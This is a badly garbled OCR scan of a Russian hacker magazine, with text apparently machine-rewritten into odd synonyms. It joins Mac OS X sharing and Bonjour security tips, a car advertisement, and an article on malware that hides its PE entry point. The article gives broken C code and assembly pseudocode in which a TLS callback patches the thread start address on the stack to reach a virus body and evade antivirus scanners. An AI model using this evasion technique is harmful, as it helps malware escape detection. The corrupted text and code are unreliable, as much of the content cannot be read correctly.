пропадет алкающий внести твой троян.     Система самоё предложила 0ИогІ Ыате, рано или поздно моя персона сместил в  него фокус. В 00.6 приближенно будетзаполняться равным образом поляна РазвѵѵогсІ     В БАРАШ   Хорошо, а вроде насчетЗаІагі? Ведь сие узловой средство взаимо- образ действий пользователя от Сетью (в которой его поджидаешьты).  Представь себе, хотя на Заіагі кто в отсутствии защиты с фишинга. Более того, на  версии 0.1 .1 про ѴѴІ псіоѵѵз аж была мочь нетривиально заменить предмет адресной строки — этак сколько не грех было пред-  ставляться неграмотный длиннющим (вызывающим подозрения одним всего счетом букв) Ы Р?Б, а не мудрствуя лукаво да малопритязательно — еЬау.сот, раураі.  сот, аІІаЬапк.ги... В версии 0.1 .1 лафу прикрыли. Это делает Заіагі  последним браузером без участия эдакий функции — во Іпіегпеі Ехріогег равно  Рігеіох возлюбленная давнёшенько есть. Скорее всего, резво недочет исправят — да доколе позволено пользоваться.   Заіагі адски не раз упоминается на различных сводках — да его открытая порцион (ѴѴеЬКІі) да закрытая проприетарная (та часть, которая автома-  тически запускала скрипты на терминале). Например, чувствительность во  ІІЬШ использовалась во ІРбопе вместе с прошивкой 0.1.1 про джейл брейка (по  сути, исполнения произвольного кода). Закрытая недавноуязвимость  позволяла портить память, предлагая пользователю зір-архивы  со чрезмерно длинными именами. В общем, Заіагі, особенно от момента  выхода версии про ѴѴІпсІоѵѵв равно появления ІРИопе, — спинар пристального  внимания. То, сколько ѴѴеЬКІі опять же используется на боодіе СЬгогпе, собс-  твенном браузере ІМокіа равно — нередко — на Ерірбапу, делает его дополнительно  привлекательным. Вдобавок, ѴѴеЬКІі простой, крошечный равным образом еголегко  читать, открывать да трансформировать перед себя, а гибельность становиться макюзе- кашаса минимальна.   ^ ОСТАЛЬНАЯ СЕТЬ   Я безвыгодный буду тебе обманывать — вМасО5Х10.5 объединение умолчанию отключен файрвол.  Там принимать вделанный файрвол, основанный получи и распишись ірбѵѵ, юниксовом фильтре  пакетов, равным образом в соответствии с дефолту возлюбленный отключен. Однако сообразно тому а самому умолчанию во Мае 05Х кто в отсутствии ни одного включенного сетевого сервиса. Каждый стервис юзер в долгу вливать автономно (Зузіет Ргеіегепсев  -> БИагіпд). РІІеЗНагіпд опять же содержите себя РТР да 0МВ, да их нужно     ХАКЕР 01 /119/ 08     ► 065     >> взламывание     Й^Я     НЕ     |Удали сии двум строки равным образом Воп|оиг перестанет|  ■дтрепать лишнее|     ІІ — ч     ІТакгезоигсеІогк хранится вгір-архиве|        ІПоумолчанию гостю разрешено стяжать кончать  |ступ ко папке РиЫіс, же сие усилий исправить^      > ѵѵагпіпд   Внимание! Инфор-  мация представлена до невероятия не без;  целью ознакомления!  Ни автор, ни редак-  ция из-за твои поведение  ответственности неграмотный  несут! заключать в себе неслиянно — по части умолчанию протоколом доступа для  файлам является АРР (Арріе Рііе Ргоіосоі]. Правда, веро-  ятность того, в чем дело? утвоего друга/соседа сии сервисы будут  включены — нисколечко отнюдь не нулевая: Маки нормально покупают на качестве второго компьютера (например, компьютер Арріе из сохранением настольного РС], да 0МВ включают, дабы зарядить перекачку файлов тама -сюда. ѴѴеЬ ЗЬагіпд вклю-  чает Арасбе, Зсгееп Збагіпд охватывает ѴІМС, Петоіе І_одіп содержит ввбсі.   Что твоя милость можешь предпринять  со этой информацией? Во- пер-  вых, тебе добровольно (хотя круглым счетом хорошенького понемножку проще) держать  Мак — довольно І_іпих(0реп51І5Е, например); сов-  ременные дистрибутивы включают поддержку АРР равным образом  тРЫЗгевропсІег, да ввб-клиенттоже.   Тут куда важен тОМЗгевропсІег — Арріе называет его  Вогфоиг. Это вариант зегосопф динамично используемая  Арріе умереть и отнюдь не встать по всем статьям кряду (от подключения ІТи пев для сетевым  колонкам АігТипев впредь до разрешения локальных доменных  имен). Он оповеститтебя отом, что такое? на Сети появился Мак, равно в рассуждении сервисах, которые предоставляет (также погоди мою  статью что до безопасности ІРбопе во августовском номере X, затем всегда изрядно до мельчайших подробностей изложено).   Теперь твоя милость вот Мак, твоя милость вот его ресурсы, твоя милость смотри присоединенный біе збагіпд. Первое, почто спирт тебе даст — под-  ключение почти гостевой записью (посмотри нате скрин-  шот — заметь, теледоступ гостю позволено равно прикрыть). Есть  вероятность, ась? гостю будут доступны по сию пору внешние тома,  подключенные ко Маку равно расшаренные руками (авто-  матически да корректно шарятся исключительно НР5+-тома). В  гостевой папке (-/РиЫіс) тебе ничто особенно безвыгодный светит   — симпатия доступа исключительно в целях чтения. Плюс, во ней лакомиться кошель  Эгор Вох, доступная только лишь про записи.   Что тебе сызнова удастся узнать? Ты можешь получи чать чувствовать  логин пользователя. У пользователя лакомиться полное прозвище (ска-  жем, Сернуля Иванов) равным образом короткое фамилия [II N ІХ-л оги н) . Мае 03  X пытается состоять бог полезной равным образом предлагает человеку, некоторый ввел свое полное имя, уместный логин (в книжка числе, во переводе из русского). Вероятность того, который возлюбленный согласится — высокая. Узнать полное прозвище равно как мелочёвка   — теория использует его для того именования гостевой папки  пользователя (Сергей Иванов"з РиЫіс РоЫег] — почерпнуть изо сего вегдерѵапоѵ несложно. Более того, даже если сие пер-  вый (или совсем единственный) юзер для компью-  тере, та но диаграмма будетиспользована присутствие его именовании   — Сергиян Иванов"вМасВооІцСегейИванов’віМаситак  далее. Помни, в чем дело? длинное равным образом короткое наименование отнюдь не непременно  связаны. Длинное фамилия не запрещается пустить в дело подле логине в области  АРР, короткое — подле логине до ззб.   А что, если бы рядом регистрации абонент решит малограмотный инъекцировать никакого пароля? После короткого предупреж-  дения (кто но его читает!) режим согласится. Тебе сие кой-что даст — однако, неграмотный теледоступ соответственно взЬ. АРР пустит тебя  вдомашнююпапку, нонилогинповвб.нивисіо мучиться далеко не будут (в Мае 05 X читатель гооі отключен, равным образом адми-  нистративные пользователи вводят настоящий пропуск рядом выполнении висіо).   Й ЗАЩИТИ СЕБЯ   Если тебе отнюдь не посчастливилось избежать этой чумы XXI века, равно твоя милость что ни говори стал макюзером (или поставил БеорагсІ, напри-  мер, возьми М5І ѴѴІпсІ), благотворно бы знать, какзащитить себя с  любопытных исследователей.   Смотри, глотать без труда очевидные манатки — пользуй-  ся нормальным паролем, включи автоматическое блокирование экрана возле старте скринсейвера, изучи равно  пойми работу системы. Н ет никакого смысла делать по-под стандартным пользователем равно постоянно весь  ключаться в администратора — особой разницы твоя милость далеко не заметишь (стандартному малограмотный разрешено минуя ввода  пароля возлагать приложения во /Арріісаііопв равно чертить на  корень). Но есть расчет зачислить файрвол, включить ѴЫС  (обойдешься ввб).   Конечно, Вощоиг оповестит что до твоем звЬ всех, кто такой  находится во твоей яма — да его дозволено поклониться равно отнюдь не действовать этого. Открой на правки обложка настроек  демона, запускающего ввИсІ — висіо ѵі /ЗувІет/ЫЬгагу/  ЕаипсбОаетопв/ввб.рІівІ. ЭтоХМФ-файл, кто будет мелочёвка читать. Ты найдешь вслед за тем двум строки   — «<зІгіпд>зеИ</зІгіпд>» равным образом «<в1гіпд>в11р-ввб</в1гіпд>»,  которые собственно говоря равным образом сообщают Еіощоиг, какие сетевые  сервисы представляет ввбсі, нет-нет да и возлюбленный запущен. Удали  строки, перезапусти ззбсі и, вуаля, — обслуживание свыше никак не  регистрируется Вощоиг.   Если утебя Мак, поставь слово получи ЕРІ/ОрепРігтѵѵаге   — возлюбленный малограмотный позволит навалить его на однопользовательском  режиме, а снять вне вскрытия корпуса его малограмотный удастся.  Если твоя милость окончательный параноик — в целях тебя на Мае 05Х вкушать малость особенное. Это РІІеѴэиІі, зашифрование твоей  домашней папки самым большим ключом получи во всех отношениях Диком  Западе.   То есть, на смену /Еівегв/уоигпіск у тебя довольно отражение диска,  зашифрованный приблизительно надежно, в чем дело? коли вместе с ним хоть сколько-нибудь слу-  чится (или неравно твоя милость забудешь пароль), ведь можешь попро-  щаться со своими данными. Однако пусть даже коли злоумыш-  ленник вам рвет у тебя сумку  со ноутбуком, разломает его равным образом во ыта экран не дает спуску диск, ни байта твоей информации  извлечь некто невыгодный сможет.   Конечно, неравно твоя милость неграмотный выключил его равно во памяти содержит-  ся хоть сколько-нибудь важное — ее позволительно охладитьжидким азотом,  извлечь равно осмотреть сверху специальном оборудовании.  Ничего никак не поделаешь! Компьютерная тревога  представляет на лицо настоящую «уловку-22»! ІЗС     ► 066     ХАКЕР 01 /119/ 08       СЕ   СЕ      НОВЫЙ СЕМИМЕСТНЫЙ ІЧІ55АМ рА5НдАІ+2  БОЛЬШЕ МЕСТА ДЛЯ БОЛЬШОГО ГОРОДА   • З-й шеренга сидений тож утроенный габариты багажного выделения   • Система полного привода АН МСЮЕ 0x4   • 0 подушек безопасности   • СЭ-аудиосистема равным образом порядок беспроводный отношения Віиеіооій® к мобильного телефона  со управлением возьми руле   • 07-дюймовые легкосплавные диски   • Электронная режим стабилизации Е5Р   • Рейлинги 0      5НІРТ ТИеѵѵаууои тоѵе*     ѵѵѵѵѵѵ. п і зза п . г да     СЛУЖБА ПОДДЕРЖКИ КЛИЕНТОВ ( 0 000 000 09 00 I СПЕЦИАЛЬНАЯ ПРОГРАММА ДЛЯ КОРПОРАТИВНЫХ КЛИЕНТОВ I ТЕСТ-ДРАЙВ У ОФИЦИАЛЬНЫХ ДИЛЕРОВ 0     ГАРАНТИЯ СОСТАВЛЯЕТ 0 ГОДА ИЛИ 000 000 КМ ПРОБЕГА. ГАРАНТИЯ ПРОТИВ СКВОЗНОЙ КОРРОЗИИ — 02 ЛЕТ НЕЗАВИСИМО ОТ ПРОБЕГА.  ЗА ПОДРОБНОЙ ИНФОРМАЦИЕЙ ОБРАЩАЙТЕСЬ К ОФИЦИАЛЬНЫМ ДИЛЕРАМ.     ІМІ35АМ РІЫАІМСЕ   специальная кредитная утилита     Подробности в соответствии с телефону: 0 000 000 000 0 другими словами у официальных дилеров. Компания ООО «Ниссан Мотор Рус» неграмотный предоставляет служба по части кредитованию. Услуги до кредитованию в соответствии с программе ІМІ55АЫ РІЫАІМСЕ  предоставляются ЗАО «ЮниКредит Банк» (генеральная право ЦБ РФ №1). Программа  Міззап Ріпапсе доступна кайфовый всех городах, идеже снедать официальные дилеры.     ІЧІ55АМ А55І5ТАМСЕ  ПОМОЩЬ НА ДОРОГЕ     1 Перечисленные опции входят невыгодный умереть и неграмотный встать безвыездно комплектации.   2 В зависимости с наличия автомобилей у официальных дилеров.   3 Первичная техническая вспомоществование получай дороге, отправка вплоть до ближайшего дилерского центра.     НА ПРАВАХ РЕКЛАМЫ взламывание     КРИС КАСПЕРСКИІ     МАЛ ВАРЬ     ПОКОЛЕНИЯ     Исследование совершенной заразы)     |В сентябре 0008 датчики распределенных антивирусных сетей зафиксиро   ніі : ннпвнан     |вали неооычную предприимчивость — пандемия малвари нового поколения основные положения     ^^ц^^^^нение пр^^^^^^^^^^^^менно от Индонезии, Вьетнама     [и Таиланда, обходя антивирусные преграды бери форсаже. Я сие мастерство раск     тил, написав пару РОС’ов, демонстрирующих технику сокрытия истинной     точки входа во оайл. Это актуально безвыгодный токмо интересах зловредных программ, только равно     ;ля легальных протекторов     стория началась единаче сколько-нибудь парение назад, рано или поздно ваш покорнейший слуга ковырял  червей, обходивших персональные брандмауэры чрез  создания удаленного потока равным образом вызывавших АРІ-вызов  СгеабеКетоЬеТЬгеай. В качестве стартового адре-  са ему передавался курсор держи вредоносный код, инъекцированный на  адресное площадь жертвы — например, выделением памя-  ти получай куче вместе с последующим копированием зЬеІІ-кода АРІ-вызовом     ИгібеРгосеззМетогу. Чтобы «выкупить»левые потоки, стоит поглядеть держи их минимальный адрес. У «нормальных» потоков симпатия указывает во сфера страничного имиджа РЕ-файла, а у «рукотворных» — лежит во  стеке, куче (или уже неясно где].   Вот исключительно ни Ргосевв Ехріогег Марка Руссиновича, ни дажеБоШСЕ безвыгодный желали показывать истинные стартовые адреса «рукотворных»  потоков. Высвечивали какой-то помешанный адрес, главный во утроба      ► 068     ХАКЕР 01 /119/ 08        Конференция АѴАР-2008, посвященная (анти) вирусным технологиям, получай которой автор этих строк собираюсь зачитать близкий речь касательно способах подмены точки  входа на обложка     КЕЩЕІ32 .БЫ,, что, конечно, зверски подозрительно, же бери веществен-  ное суждение малограмотный тянет. Поковырявшись во системном загрузчике, ваш покорный слуга  выяснил, что-нибудь фактический первоначальный адресочек потока находится практичес-  ки получи самом дне стека. И буде малварь малограмотный предпринимает дополнитель-  ных способов маскировки, так «рукотворные» потоки обнаруживаются  тривиальным сканером, тот или другой равным образом был написан мной, ась? называется по мнению горячим следам да послан Марку Руссиновичу с  со баг-рапортом держи Ргосевв Ехріогег. Поскольку дрянной реакции приближенно да малограмотный последовало, оповещение был обнародован получи радикально респектабельной хакерской тусовке  ОрепРСЕ.огд. Но равно дальше некто остался незамеченным.   Годом позже, разгребая завалы своихзаметок, нацарапанных получи клочках  бумаги, ваш покорнейший слуга заинтересовался — бери каком этапе загрузки файла исходный домицилий базового потока попадаете стеки не запрещается л равным образом его переработать изЛБ-  саІІЬаск"а сиречь функции ОІІтаіп статически прилинкованной ОП, Ока-  залось, который исходный местоположение формируется давно инициации ЛБ/ЭНглат, а в дальнейшем инициализации обращения коригинальной точке входа, пропи-  санной на РЕ-за головке, поуже никак не происходит. Система использует адрес, содержанный на стеке, равным образом данный ячейка истинно может бытийствовать изменен.  Отладчики (не говоря уж по части дизассемблерах) ктакой «подлянке», разу-  меется, безвыгодный готовы равно на своей массе не мудрствуя лукаво теряют сличение надо исполня-  емым файлом! Я шелковица а написал сгаскте, выложил его нате ОрепРСЕ, же  хакерская коллектив никак не оценила предложенныйтрюк в области досто-  инству. В результате а ваш покорнейший слуга потерял кэтой затее какой есть интерес...   Тем временем, хакерская соединение (пожелавшая остаться втени, во смысле далеко не оставившая во коде никаких инициалов) переоткрыла  технологию измененияточки входа, использовав ее во малвари нового  поколения. Статическими антивирусными сканерами возлюбленная невыгодный обнару-  живается на принципе! Как минимум, нужен настоящий эмулятор  ЦП не без; качественным эмулятором окружения ѴѴІпсІоѵѵв, учитывающим  недокументированные особенности системного загрузчика РЕ-файлов  (а в частности нате них держится устройство подмены точки входа).   Из всех существующих антивирусов малварь нового поколения теперича  могутобнаруживать всего только N0032, Р-5есиге, Бутапіес, КАѴ, Эг.ѴѴеЬ, ага да то, только лишь затем усовершенствования эмулятора окружения ѴѴІпсІоѵѵв.  Остальныетихо курятв сторонке. Неудивительно, что такое? распространение РОС"ов  знакомым сотрудникам антивирусных компаний (Сбескроіпі, Бутапіес,  Р-$есиге, К7Сотриііпд) вызывала точный резонанс, завершив-  шийся посылом меня... нет, тама меня послали горячие ребятушки с КАѴ"а.  Ладно, сие совершенно шутки. А положение кардинально серьезна. Уж далеко не ваш покорный слуга ли спрово-  цировал генерация малвари нового поколения? Нет да снова раз в год по обещанию нет. Это целиком и полностью независимая открытие неизвестной хакерской группы (что незатейливо доказывается анализом кода). Несмотря нато, зачем выше-     сгаскте да обозначенная малварь исповедуют идентичные концепции,  детали реализации окончательно различны. Позиция стартового адреса  потока на стеке непостоянна да варьируется даже если на рамках в одиночку  взятой версии операционной системы. Это высадило меня для разработ-  ку системно-независимого алгоритма, сканирующего плеть для содержание  поиска больше всего вероятных кандидатов возьми функция стартового адреса. В также самое время, пойманная малварь используетфиксированные  локации да поелику функционируеттолько подина нетерпимо определенными  версиями операционной системы. Логично, неравно бы хакерыувидели моего сгаскте, они бы положительно позаимствовали системно-незави-  симый алгоритм, однако сего неграмотный произошло. Значит, глотать всегда начала  предполагать, что-нибудь сие — детище параллельных исследований, равно моя персона здесь положительно никак не причем.   В нынешнее срок пароходство Епбеаѵог Бесигііу, Іпс работает по-над  армированием АМР (Асііѵе Маіѵѵаге Ргоіесііоп], присобачивая кней  перехаченный х86ети совокупно из эмулятором окружения ѴѴІпсІоѵѵв,  «осведомленным» насчёт недокументированных возможностях системного  загрузчика РЕ-файлов. Так что-нибудь АМР имеет однако преимущество попасть первым  коммерческим продуктом, способным узнавать малварь нового  поколения да нетолько распознавать, хотя равно блокировать.   А трудность фактически встает на точный умножение равно нежели дальше, тем  выше. Какое-то минута антивирусы малограмотный смогут определять малварь,  изменяющую точку входа во РЕ-файл, да нам придется отстаивать от ней  вручную, а с целью сего нужно далеко не лишь даю голову на отрез однако сохранять ША-Рго/НІЕѴѴ во руках, же равным образом понимать толк во недокументированныхтонкостях работы  системного загрузчика. О них автор без дальних слов да поговорим.   Н ТОЧКИ ВХОДА — ЖИВЫЕ И МЕРТВЫЕ   Спецификация сверху РЕ-файл с Місговоіі описываетспециальное нива во  РЕ-заголовке, хранящее соразмерный условный адресок (РѴА) точки  входа на файл, вместе с которого по образу бы да начинается его выполнение. «Как бы», в силу того что почто уровень входа (она но Епбгу Роіпі) выполняется никак не первой, а  последней.   До передачи управления возьми Епігу Роіпі общественный порядок загружает безвыездно стати-  чески прилинкованные динамические библиотеки, вызывая функции  ОІІтаіп, исполняющиеся на контексте загрузившего их процесса равным образом спо-  собные оказывать влияние получай него любым образом. ТЕБ-саІІЬаск’ равно (да -да,  те самые, что до которых да мы вместе с тобой ранее говорили на #5 «Эн великан един анти отладоч-  ных приемов») в свой черед получают регулирование вплоть до выполнения точки входа,  которой, вообще-то, может равным образом безграмотный быть. В самом деле! Если ОИтат иначе  ТІ_5-саІІЬаск «забудет» возвернуть взад управление, точку входа требовать  станетуже некому да вследствие этого симпатия можетуказывать держи всякий код! Но безвыгодный  будем забегать вперед.   Рассмотрим строгий алгорифм определения точки входа, защипнутый возьми обстановкае многими антивирусами, отладчиками, дизассемблера-  ми, определителями упаковщиков ит.д., ит.п. — устали перечислять.   КЛАССИЧЕСКИЙ СПОСОБ   ОПРЕДЕЛЕНИЯ ТОЧКИ ВХОДА В ФАЙЛ     ЕсіеЕіпе РЕ_оЕЕ ОхЗС  Есісііпе ЕР_оЕЕ 0x28  оЕЕзеЕ   ВУТЕ* СеЕЕР ( )   {   ІС ВУТЕ*  зЕаЕіс ВѴ/ОВВ  спав ЪиЕ     //РЕ тадіс стогЭ лай оЕЕзеЕ  // геІаЕіѵе ЕпЕгу РоіпЕ Еііесі     Ьаз е_х , * ер_айг ;  ре_оЕЕ , ер_оЕЕ;   " МАХ РАТН1 ;     // оЬЕаіп ехе Ьазе асИгезз  СеЕМосіиІеЕіІеМате ( 0 , Ъ равно Г , _МАХ_РАТН) ;   Ъазе_х - (ВУТЕ*) СеЕМоеи 0 еНапсІ е (Ъи т ) ;  ре_оЕЕ=* ( ( В В, 0 СВ В* ) (Ьазе_х + РЕ_оЕЕ) ) ;  ер_оЕЕ=* { ( ВЕЮ ко В* ) (Ъазе_х + ре_оЕЕ + ЕР_оЕЕ) )  ер_асг=Ъазе_х + ер_оЕЕ; // ВѴА Ео ѴА     ХАКЕР 01 /119/ 08     ► 069      Адрес точки входа на файл, стелющийся получай дне стека базового потока     ВЗЛОМ     ВИ12РР0ІІ  0В12ГГ&Й  0012ГРВС  0012РНЬ0  В012ГГЕ*і  ЙЙ12РРРЙ  Ѳ012ГГЕС  Ѳ012ГГР 0  ЙЙ12ГРРІ1    ешновноо  001 0 г гее  00000000  РРРРРРРР  79*101 Г54  79*і32В1Ѳ  00000000  00000000  00000000    Епй оР 0ЕН спаіп  Гіапйіѳг   КЕВМР1 02-79432В1Й    0012РРРВ    Ѳ0409В50    Ріеііо . ОІосіиІеЕпІігуРоі пё>    Ѳ012РРРС    00000000       ■ ер_а <3 г ;   }   Конечно, «промышленная» воплощение функции веіЕРО выглядит с грехом пополам  сложнее, потому осуществляет избыток проверок, опущенных на  листинге для того простоты понимания. Но малограмотный на проверках дело, а на концеп-  ции. Дырявой, естественно.   Отладчики ставятсюда бряк, на надежде, в чем дело? некто сработает. Но дьявол невыгодный  сработает, ежели адресточки входа изменен. Стоп! Я опять двадцать пять устроил  кавардак. Еще раз, не торопясь равным образом в соответствии с порядку. Когда настройщик порождает тестовый эксплуатация равно запускаетего держи выполнение, так первым сраба-  тывает бряк, запущенный системой на функцию ІЯТЩіЫ ОЬдВгеакРоіпб.  Она сигнализирует относительно том, в чем дело? отлаживаемый обложка спроецирован во ад-  ресное район равно не без; ним позволяется корпеть на правах со своим собственным.  В частности, считывать РЕ-за головок равным образом вычислять бряк сверху точку  останова. Дело втом, ась? операционная строй казаться малограмотный информирует настройщик в рассуждении передаче управления держи точку входа равным образом прослеживать нынешний движение настройщик вынужден самостоятельно.   пЬйІІ ! БЪдВгеакРоіпІ: :   7769193с сс іігЬ 0   Дизассемблеры никакихбряков неграмотный устанавливают, а попросту дубово начи-  нают дизассемблирование сточки входа. Что а касается антивирусов, так вообще-то шелковица действуют небо и земля стратегии. Сигнатура может бытийствовать  привязана малограмотный токмо для точке входа, же да для смещению касательно кон-  ца/начала файла (или секции). В этом случае, изменениеточки входа коврижки отнюдь не повлияет возьми умственные талантливость антивируса. Однако, накануне нежели отыскивать сигнатуру, обложка нуждаться распаковать, а на случае  полиморфных вирусов — вновь равным образом прогнать их от эмулятор. И воттут-то без участия правильного определения точки входа никак не обойтись!   Некоторые вирусы используют хватит хитроумный трюк, совершая щтр  изТІ_$-саІІЬаск"а,то есть, фактически, выполняя ТЕЗ-саЕЬаск без участия  возврата управления. В результате аюшки? оригинальная остановка останова подходит лесом равно может заключать в чем дело? угодно. Конечно, на разумных преде-  лах. Наглеть далеко не стоит. В частности, начиная сХР, единый загрузчик  выполняет галерея проверок, равно файлы сточкой останова, вылетающей после границы страничного образа, просто-напросто безвыгодный загружаются на память! Но ажно буде бы они равно загружались, для того антивируса такая степень останова выгля-  дит чрезмерно темно равно легколовится эвристическим анализато-  ром. Какой ум шмалять себя получи и распишись мелочах? Лучшезасунутьвточку входа кроткий код, а изТІ_Б-саІІЬаск"а содеять перерастание бери вирусное  тело. В грубом приближении сие выглядит так.     ПСЕВДОКОД МАЛВАРИ СТАРОГО ПОКОЛЕНИЯ, ПЕРЕКРЫВАЮЩЕЙ  ТОЧКУ ВХОДА В РЕ-ФАЙЛ ПОСРЕДСТВОМ БЛОКИРОВКИ ВОЗВРАТА  УПРАВЛЕНИЯ ИЗТІ-5-САІ-І-ВАСК’А   ЕпСгуРоіпі :   ХОК ЕАХ, ЕАХ  Р118Н ЕАХ   САЬЪ й, йз : [ЕхііРгосезз]   ѴігизВойу :     ТЬ8_Са11Ьаскі :   ЙМР ѴігизВойу   На самом деле, антивирус, эмулирующий И$ (а проэмулироватьего  несложно, благо, симпатия ранее исстари документирован), разломает эту комби-  нацию равным образом аж никак не крякнет. Хотя в практике подавляющее квалифицированная  антивирусов либо не насчет частностей отнюдь не знают по части существовании ИЗ, либо эмули-  руют их некорректно, почто открывает большущий горизонт ради творческих  махинаций соответственно сокрытию зловредного заключение во самых неожиданных  местах.   Атеперь поживем — увидим сверху псевдокод малвари нового поколения:   ЕпСгуРоіпі: :   ХОК ЕАХ, ЕАХ  Р118Н ЕАХ   САЬЬ й, йз : [ЕхііРгосезз]   ѴігизВойу :     ТЬ8_Са11Ъаск1 :   АБО й, йз : [Е8Р+тадіс_об6зеЕ] , оібзеб ѴігизВойу  — оббзеб ЕпЬгуРоіпС  КЕТЫ ОСЬ   На первоначальный зрение дрянной разницы, а кабы помыслить головой, ведь различие короче просто-напросто драматической. В первом случае я имеем вничью далеко не вуалированный безнравственный щтр изТЕЗ-саІІЬаск"а. И добро бы его дозволено скрывать вместе с через самомодифицирующегося заключение сиречь  запутанных математических преобразований, целевой код перехода     ► 070     ХАКЕР 01 /119/ 08       декодируется конкретно да указывает нате вирусное тел о.   Во втором случае ТІ_5-саІІЬаск добавляет какое-то зна-  чение ко некоторой ячейке памяти, лежащей на области  стека, равно возвращает правление системе. Человек из  отладчиком значит трансцендентно можеттрассировать  тонны машинных инструкций, ответственных ради ини-  циализацию файла. Он может даже если дождаться момента  передачи управления получи и распишись точку входа либо — либо хоть бы бы об-  ласть памяти, невыгодный принадлежащую системе, а находящу-  юся на границах РЕ-файла либо одной изо динамических  библиотек. И позднее собеседник вместе с удивлением обнаружит, который пиксел входа каким-то магическим образом безграмотный вдоволь  лучает управления! Вот исключительно проводить соединение придется целый век да непродуктивно.   Антивирусам доводится единаче хуже. Они отнюдь не могут трассиро-  вать код, исполняющийся получай темпераментный операционной системе  (врядли имеет смысл объяснять, почему]. Откуда им знать, зачем в частности находится на данной конкретной ячейке памяти? А  что, в конечном счете говоря, со временем находится равным образом вроде оно тама попа-  дает? Попробуем разобраться!   Н ТАЙНЫ СИСТЕМНОГО ЗАГРУЗЧИКА   Существуют разные уровни недокументированности.  Определенные свойства системы возникают на силу осо-  бенностей реализации хорошо взятого билда. Содер-  жимое стека бери час ста рта потока, сила регистров равным образом флагов получай моментвыхода изо АРІ-функций — нетолько безвыгодный  документированы, же сызнова да варьируются на широких преде-  лах. А вследствие чего во долгосрочной перспективе закладываться возьми них нельзя.   Стартовый адресочек потока представляетсобой редкое исклю-  чение изо правил. Он нацело недокументирован равно на ведь но миг необходимо подобает с документированных функций равно особенностей работы системного загрузчика. Системный  загрузчик во грубом приближении работаеттак:   1 . Проецирует РЕ-файл на эйдетизм .   2 . Считывает РЕ-заголовок , извлекает от того места важность точки останова , представляющее внешне соответственный воображаемый адресок (ПѴА) равным образом весь  водит его во линеечный адресок (ѴА) хорошенечко сложения  со базовым адресом, и хранящимся во РЕ-за-  головке .   3 . ѴА-адрес точки входа передается функции  СгеабеЕетобеТЧтгеаб { ) на качестве одного с  аргументов. А передается спирт вследствие стек, пос-  кольку 02 -разрядные версии Міпбоѵтз используют  БббсаІХ-соглашение интересах всех АРІ-функций помимо  исключения ( 04-разрядные версии Ѵ/і псіоѵуз ис-  пользуют -анГ-СЗ 0 0 -соглашение , передавая аргу-  менты чрез регистры да первоначальный местоположение потока во магазин далеко не попадает} .   4 . Стартовый код базового потока {указыва-  ющий возьми точку входа) позже прохождения всех  проверок заталкивается на стека равно сильнее для РЕ-  заголовку режим безвыгодный обращается (это куда достопамятный момент) .   5 . СгеабеРешобеТЬгеаб ( ) выполняет инициализа-  цию потока, во процессе которой отрабатывают-  ся функции Г)1 0 молчок і г. статически прилинкованных  БШ, а в свой черед имеющиеся ТЬЗ-саІІЪаск"и (если  они, конечно, есть) .   6. На завершающем этапе инициализации РЕ-фай-  ла, СгеабеРешобеТЕгеаб ( ) зовет недокументиро-  ванную, малограмотный экспортируемую, преимущественно внутреннюю  функцию ВазеРгосезз ( ) , передавая ей минимальный      Баг-рапорт 0006 годы держи Ргосевв Ехріогег Марка Руссиновича, идеже в центральный раз был  обозначен адресточки входа, хранящийся на стеке потока домицилий потока , зачерпнутый с стека на качестве  аргумента .   7 . ВазеРгосезз ( ) передает регулирование в области ука-  занному адресу.   Какая интересная эскиз получается! Точка вхо- истинно представляет собою параметр АР I- функции  СгеабеКетобеТЬгеай (), имеющей документирован-  ный архетип (МІСГ050ІТ его всецело безвыгодный собирается  изменять). Причем, этотаргумент попадает бери хлыст накануне  отработки ОІІтаіп/ТЕЗ-саІІЬаск, а извлекается изо стека  послетого, какони возвратятуправление. Никакие  проверки валидности стартового адреса потока далеко не  выполняются, а сие значит, ась? ОИтаіп/ТЕЗ-саНЬаск  могут доносить первоначальный адресочек потока объединение своему  усмотрению. Собственно говоря, сие объективно чтобы  всех потоков, а отнюдь не лишь только про базового. Просто местожительство  базового потока прописан вточке входа во РЕ-файл, а  адреса остальных потоков передаются во вкусе доводы  функции СгеаЬе [Кетобе] ТЬгеай ( ) .   Другими словами, пятнышко входа во обложка попадаете хлыст безграмотный  случайно, а примирительно логике работы системного загрузчи-  ка, которая справедлива с целью всей 02-разрядной линейки  ЫТ-подобных систем да ибо упоительно работает на правах в ѴѴ2К, таки держи 0егѵег2008. Единственная дело на том, который разряд аргумента функции СгеаІеВетоІеТЬгеасШ  системно-зависимо. Множество внутренних функций из  недокументированными прототипами используют стек,  складируя тама близкие аргументы. Это, блин, затрудняет нашу  задачу.   Разработчики обозначенной малвари идемте в области пути  наименьшего сопротивления. Они несложно протестировали серия версий операционных систем, определив сме-  щение стартового адреса базового потока условно  дна стека, позже зачем загнали их во одну таблицу. Попав получи чужеземный компьютер, малварьопределяетверсиюоси, извле-  кая соответствующее «магическое смещение» с сопутс-  твующей таблицы. Это на часть случае, даже если данная модификация  ѴѴІпбоѵѵв поддерживается малварью. Ну а кабы нет?   Я чтоб моя персона тебя не видел объединение другому пути. Менее надежному |и допуска-  ющемуложные срабатывания), хотя зато много побольше  универсальному. Все просто! Считываем РЕ-заголовок,  извлекаем от того места подлинную точку входа равно спустя время скани-  руем плеть в дисциплина поиска подходящих кандидатов.  Естественно, степень входа может оказаться одинаковым со значением,      > ІПІ"о     При определенных  обстоятельствах сис- вызывающий подозрение загрузчик доставать  гло игнорирует точку  входа, прописанную во РЕ-файле. Потому симпатия может выделять получи безвредный адрес  (типа неотложный  ЕхіІРгосе55І, на так эпоха какзловред-  ный адрес расположен вовсе во другом  месте. Отладчики равным образом дизассемблеры и обламываются,  выдавая фальшивый  результат.     ХАКЕР 01 /119/ 08     ► 071       \г" : , \ * -   Л , *ѵи г» ►... I ■-« чѵъ *~ Г* ■,-.* ■»-.   • А ^ ; ~*   г,- # I і ■ ; • равным образом ‘-і >«=і -■■-   ІЭ      І»И5 гтгс ѵ *Э«1 Мй -лтэ: > й алса>шч   гут і:м [^п > :-.*■■?, ":гг- «Ьидо ѵ-: :м «пщз!#!!   " *ѴЧ і  і "ЯЧи*’»>   - і - лкяѵл і. " "■.     1 Д|ГіиЩііі’і     к:4оЗ."_-т.4   - ■- - •-! - .1 для &   ,• • ■ • М /.*л» ко ОЛ17» Л.І  _у*і*# ■ аі і.лІСв шй.   • I н %А|л.Р*1> I-.— і!  іиі ь і ■:*«■ і. л ,-л/ 0 і і а     I Ьм*№ [ Чі 0*:рііаі , иртіт: і ргіГ 